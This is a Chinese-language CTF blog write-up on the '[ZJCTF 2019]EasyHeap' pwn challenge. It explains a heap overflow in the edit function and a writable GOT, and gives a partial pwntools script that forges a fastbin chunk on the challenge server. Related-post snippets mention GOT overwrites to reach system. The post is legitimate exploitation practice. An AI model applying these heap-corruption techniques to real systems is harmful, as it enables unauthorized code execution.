heap2-[ZJCTF 2019]EasyHeap

最新推荐文章于 2023-05-30 16:39:42 发布
最新推荐文章于 2023-05-30 16:39:42 发布
阅读量170 收藏
点赞数
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/119122783
版权
ctf 同时被 2 个专栏收录
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

 做题先check找攻击手段,Partial RELRP ->修改got表

菜单题,直接找准delete看看有没有UAF。

 UAF未果。

但是在Edit_heap中存在漏洞。

这里看起来是以为可以修改heap的size,其实这个size是用来对你的输入进行限制的。(栈溢出就在这里把size写的很大,方便我们写入)

而且这个程序写的也有点问题。 它会让你修改chunk的信息域

所以 wp

from pwn import *
sh = remote("node4.buuoj.cn","26279")
sh.sendafter('Your choice :','1\n')   #create 0 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','1\n')   #create 1 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','3\n')   # free 1
sh.sendafter('Index :','1\n')
x = p64(0x0) * 13 + p64(0x71)  + p64(0x6020ad) + p64(0x0)  #create fake chunk
sh.sendafter('Your choice :','2\n')
sh.sendafter('Index :','0\n')
sh.sendafter('Size of Heap : ','1000\n')
sh.sendafter('Content of heap : ',x)
sh.sendafter('Your choice :','1\n')      #create 1 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')

详细https://blog.csdn.net/BengDouLove/article/details/105391153?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162731259516780271593086%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162731259516780271593086&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-2-105391153.first_rank_v2_pc_rank_v29&utm_term=BUUCTF+%5BZJCTF+2019%5DEasyHeap&spm=1018.2226.3001.4187

Hush^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2673
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
[ZJCTF 2019]EasyHeap
m0sway的博客
12-15 1309
[ZJCTF 2019]EasyHeap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的 edit
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 908
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
[ZJCTF 2019]EasyHeap-house of spirit
huzai9527的博客
03-15 228
[ZJCTF 2019]EasyHeap-house of spirit 先给出exp,exp中我标明了每一个步骤 每个步骤执行完后,内存中的地址空间我也贴出来了 exp from pwn import * p = remote('node3.buuoj.cn',29012) #p = process('./easyheap') context.log_level = 'debug' def creat(size,content): p.sendlineafter('Your choice :',st
api-ms-win-core-heap-l2-1-0.dll(32+64位都有)亲测可用
03-02
《api-ms-win-core-heap-l2-1-0.dll:操作系统核心堆管理库解析》 在Windows操作系统中,`api-ms-win-core-heap-l2-1-0.dll`是一个至关重要的动态链接库文件,它是系统核心堆管理的一部分,用于32位和64位系统。该...
api-ms-win-core-heap-l2-1-0(64-Bit).zip
11-27
《深入理解API-MS-WIN-CORE-HEAP-L2-1-0.dll:64位系统的内存管理关键组件》 在Windows操作系统中,API-MS-WIN-CORE-HEAP-L2-1-0.dll是核心堆管理库的一个重要组成部分,主要负责64位系统中的内存分配和管理。这个...
api-ms-win-core-heap-l2-1-0.dll (64位).rar
12-19
2. **api-ms-win-core-heap-l2-1-0.dll详解**: 这个特定的DLL文件属于Windows Core Heap API的一部分,它提供了低级内存管理功能。核心堆API主要负责内存分配、释放、内存块的复制和内存大小调整等任务,对系统的...
api-ms-win-core-heap-l2-1-0.dll
08-29
api-ms-win-core-heap-l2-1-0.dll
韩顺平 坦克大战游戏源码
12-26
韩顺平 java视频培训中讲解的游戏,根据视频讲解编写,功能基本齐全。
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 248
BUUCTF 做题练习
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 619
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 968
经典堆菜单。
[ZJCTF 2019]EasyHeap的wp
wuyvle的博客
02-25 232
还是堆题的老三样 1. 有个指针 2. edit根据堆块指针表的指针指过去,编辑堆块,,而且竟然还能重新定义可以输入的长度!! 但是堆块大小申请好了就不变了,所以这里可以随意造成堆溢出。 3. 可以用unlink做 from pwn import * sh=remote("node3.buuoj.cn",27337) elf=ELF("./easyheap") free_got=elf.got['free'] system_plt=elf.plt['system'] context.log_level.
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 882
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 463
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
set HEAP=-Xms5g -Xmx5g
最新发布
03-14
set HEAP=-Xms5g -Xmx5g是一种设置Java虚拟机(JVM)堆内存大小的命令。通过设置-Xms参数,可以指定JVM的初始堆内存大小,而通过设置-Xmx参数,可以指定JVM的最大堆内存大小。 具体来说,-Xms参数用于设置JVM启动时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值